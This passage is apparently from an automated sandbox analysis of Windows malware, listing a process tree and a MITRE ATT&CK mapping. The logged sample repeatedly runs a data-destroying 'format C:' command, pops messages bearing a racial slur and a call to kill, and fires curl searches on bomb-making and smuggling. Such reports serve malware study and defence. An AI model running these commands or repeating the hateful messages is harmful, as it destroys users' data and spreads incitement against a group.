  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:608
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1084
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2908
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2044
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6048
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5324
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5888
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:1376
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:3976
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:5128
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5704
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2716
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4884
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:544
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4068
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2840
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5324
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4388
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:5900
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:2032
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5568
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2672
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4552
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4820
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4884
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2976
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5968
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:3784
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:2032
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:1168
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5612
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2300
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2840
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2128
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4068
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3692
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5324
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4508
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4876
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:3944
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:1956
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:4832
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5760
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:572
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2128
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4924
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2300
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3488
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:716
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4188
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4680
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:5468
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6036
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4064
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6052
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5760
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1664
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5468
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3528
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2760
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:3528
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:2968
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6216
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6280
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6336
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6352
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6368
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6392
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6408
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6432
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6448
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6616
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6748
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6944
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:7024
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7068
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7104
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7120
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7136
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7152
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6156
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6164
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6288
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6400
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6520
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6784
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6752
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6976
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6832
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7000
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6968
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6944
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7056
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6196
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6356
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6348
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6720
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6508
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6748
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6816
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6952
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7008
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6168
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6476
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6420
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6944
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6216
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7060
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4508
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6424
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6184
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6168
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6296
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6872
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6444
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:2128
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6344
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6780
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6708
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6800
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6720
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6764
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6972
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6752
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6372
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6724
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6272
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:7048
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7052
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5712
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6380
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6660
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6640
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6272
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7032
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6644
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6456
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6152
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6828
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6456
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6152
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6140
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6388
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:7300
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:7376
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:7488
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:7716
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7744
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7776
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7820
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7860
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7876
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7952
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:8104
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:8156
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:7212
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:7456
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7644
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7748
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7804
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7832
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7872
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7816
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8068
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:8112
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:8176
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:8184
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:7048
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7340
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7352
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7540
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7632
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7580
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7532
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7596
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:7864
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:7912
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:8044
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:7204
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7372
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7396
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7312
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8156
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8184
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7232
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7636
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:7544
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:7656
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:7724
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:8132
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7180
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8120
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7200
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7324
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6140
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8172
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8184
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:7232
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:7508
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:7860
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:7912
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7800
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7192
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8132
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7180
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8036
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8088
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7312
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6172
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:8184
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:7548
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:8024
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7900
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7776
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7912
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8072
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8076
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8036
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7320
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:7956
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4700
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:8184
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:7844
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7828
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7884
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7872

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1928

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:6296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

